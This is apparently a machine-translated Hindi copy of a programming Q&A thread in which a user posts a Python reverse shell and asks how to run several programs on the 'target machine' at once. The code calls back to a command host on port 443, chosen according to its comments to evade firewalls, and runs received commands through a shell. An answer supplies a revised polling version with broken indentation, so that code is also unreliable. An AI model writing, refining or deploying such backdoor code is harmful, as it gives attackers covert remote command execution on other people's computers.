9

नीचे दिया गया कोड काम करता है लेकिन हर बार जब आप कोई प्रोग्राम चलाते हैं, उदाहरण के लिए लक्ष्य मशीन पर नोटपैड, जब तक मैं प्रोग्राम छोड़ नहीं जाता तब तक प्रॉम्प्ट फंस जाता है।उपप्रोसेसर मॉड्यूल के साथ Concurrency। मैं यह कैसे कर सकता हूँ?

लक्ष्य मशीन पर एक ही समय में एकाधिक प्रोग्राम कैसे चलाएं? मुझे लगता है कि इसे थ्रेड या सबप्रोसेस मॉड्यूल के साथ हासिल किया जा सकता है, लेकिन मैं अभी भी अवधारणा का उपयोग नहीं कर सकता।

मैं यह कैसे कर सकता हूं?

import socket 
import time 
import subprocess #Executar comandos do SO 

#criando a conexao reversa 

IP = '192.168.1.33' # ip do cliente linux netcat que sera a central de comando 
PORT = 443 # usamos a porta de https pra confundir o firewall : a conexao de saida nao sera bloqueada 

def connect(IP,PORT): 
    #conectando a central de controle 
    try: 
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # IP/TCP 

     s.connect((IP,PORT)) 
     s.send('[!] Conexao recebida\n')  # msg pra ver se foi conectado 
     #s.close() 
     return s 
    except Exception as e: 
     print('Erro de conexao',e) 
     return None 

def listen(s): 
##qdo o cliente nao esta escutando, da erro na conexao e fecha!. Nao quero isso. O server tem que ficar o tempo todo tentando ate conectar! 
## versao 3!!!!!!!!!! 
#versao 4 usa while True 

##########loop infinito para receber comandos 
    try: 

     while True: 
      data = s.recv(1024) # a central de controle envia tb o "Enter" que teclamos apos cada comando {\n} 
      #print(data) 
      if data[:-1] == '/exit': #tudo exceto o ultimo caractere, que eh o \n 
       s.close()#fechar conexao 
       exit(0) # 0 eh execucao normal/sem erros 
      else: #executar os comandos 
       cmd(s,data) 
    except: 
     main(s) 

def cmd(s,data): 
    try:  
     proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 
     saida = s.send(proc.stdout.read() + proc.stderr.read()) 
     s.send(saida) 
     #print(proc.stdout.read())  
    except: 
     main(s) 

def main(s): 
    if s: 
     s.close() 

    while True: 
     s_connected = connect(IP,PORT) 
     if s_connected: 
      listen(s_connected) 
     else: 
      print("deu erro na conexao, tentando de novo!!!")##so pra debug 
      time.sleep(10) 

    #return 0 #nao precisa 

s = None 
main(s) 
+3

मुझे लगता है कि आप बहु और multithreading नहीं था। थ्रेड एक प्रक्रिया के भीतर मौजूद हैं। – ElmoVanKielmo

+1

@ElmoVanKielmo, वह subprocess.Popen का उपयोग कर रहा है, जिसे आप शुरू कर सकते हैं और थ्रेड से प्रतीक्षा कर सकते हैं। थ्रेडिंग यहां एक पूरी तरह व्यवहार्य समाधान है। –

+1

@MadPhysicist चलो। इस मामले के लिए थ्रेडिंग? चल रही प्रक्रियाओं की एक सूची बनाना बेहतर है और उनमें से प्रत्येक को यह देखने के लिए मतदान करना है कि यह समाप्त हो गया है या नहीं। – ElmoVanKielmo

उत्तर

7

की तरह कुछ का प्रयास करें: स्पेनिश टिप्पणियों को निकालने के लिए

import socket 
import time 
import subprocess 
import select 

IP = '192.168.1.33' 
PORT = 443 

def connect(IP,PORT): 
    try: 
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

     s.connect((IP,PORT)) 
     s.send('[!] Conexao recebida\n') 
    return s 
except Exception as e: 
    print('Erro de conexao',e) 
    return None 


def listen(s): 
    try: 
     # Create a polling object and register socket with it 
     socket_poll = select.poll() 
     socket_poll.register(s) 
     # Create a list of running processes 
     processes = [] 
     while True: 
      # If no data is available on the socket, we can use the time to clean up processes which are finished 
      if not socket_poll.poll(1): 
       for process in tuple(processes): 
        if process.poll(): 
         s.send(proc.stdout.read() + proc.stderr.read()) 
         processes.remove(process) 
       continue 
      data = s.recv(1024) 
      if data[:-1] == '/exit': 
       s.close() 
       exit(0) 
      else: 
       cmd(s, data, processes) 
    except: 
     main(s) 


def cmd(s, data, processes): 
    try:  
     proc = subprocess.Popen(data, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 
     # Add new process to the list 
     processes.append(proc) 
    except: 
     main(s) 


def main(s): 
    if s: 
     s.close() 

    while True: 
     s_connected = connect(IP,PORT) 
     if s_connected: 
      listen(s_connected) 
     else: 
      time.sleep(10) 

s = None 
main(s) 

क्षमा करें;)

+0

धन्यवाद !! –

+0

क्या यह संभवतः थ्रेड का उपयोग कर रहा है? –

+0

हां, यह संभव है। मैं आपको थ्रेड का उपयोग करके कोड लिखने के लिए प्रोत्साहित करता हूं क्योंकि मैड फिजिसिस्ट प्रस्तावित है। चिंता न करें अगर यह काम नहीं करेगा। जब आप ऐसा करते हैं, तो हम आपको दिखा सकते हैं कि क्या गलत है और इसे सही करें। हमें यह दिखाने के लिए बस अपनी कल्पना का उपयोग करें कि आप यहां थ्रेड का उपयोग कैसे करना चाहते हैं। – ElmoVanKielmo

संबंधित मुद्दे